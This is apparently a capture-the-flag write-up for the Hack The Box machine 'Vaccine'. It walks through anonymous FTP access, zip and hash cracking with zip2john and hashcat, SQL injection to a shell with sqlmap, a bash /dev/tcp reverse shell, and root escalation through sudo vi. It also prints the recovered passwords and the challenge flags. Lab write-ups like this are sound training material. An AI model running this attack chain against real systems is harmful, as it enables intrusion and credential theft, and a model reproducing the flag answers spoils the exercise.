Vaccine
Last updated
Last updated
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine
Besides SSH and HTTP, what other service is hosted on this box?
Answer: FTP
This service can be configured to allow login with any password for specific username. What is that username?
Answer: anonymous
What is the name of the file downloaded over this service?
ftp 10.129.248.153
Answer: backup.zip
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
Answer: zip2john
What is the password for the admin user on the website?
backup.zip password:41852963
Looking at index.html
Put the hash in a file and crack the hash with hashcat
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
Answer:qwerty789
What option can be passed to sqlmap to try to get command execution via the sql injection? Looking at sqlmap -h
Answer: --os-shell
What program can the postgres user run as root using sudo?
Get the cookie from the Website.
sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
We get our shell.
Start the listener and run
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"
Answer: vi
Submit user flag
Answer: ec9b13ca4d6229cd5cc1e09980965bf7
Submit root flag
Looking at files in the /var/www/html as there's this uses PHP. Looking in the dashboard.php file we see
user=postgres password=P@s5w0rd!
Looking at various options on GTBOBins
Open a file we could only do as sudo vi
type :shell=/bin/sh
ENTER
:shell
ENTER
Answer: dd6e058e814260bc70e9bbdef2715849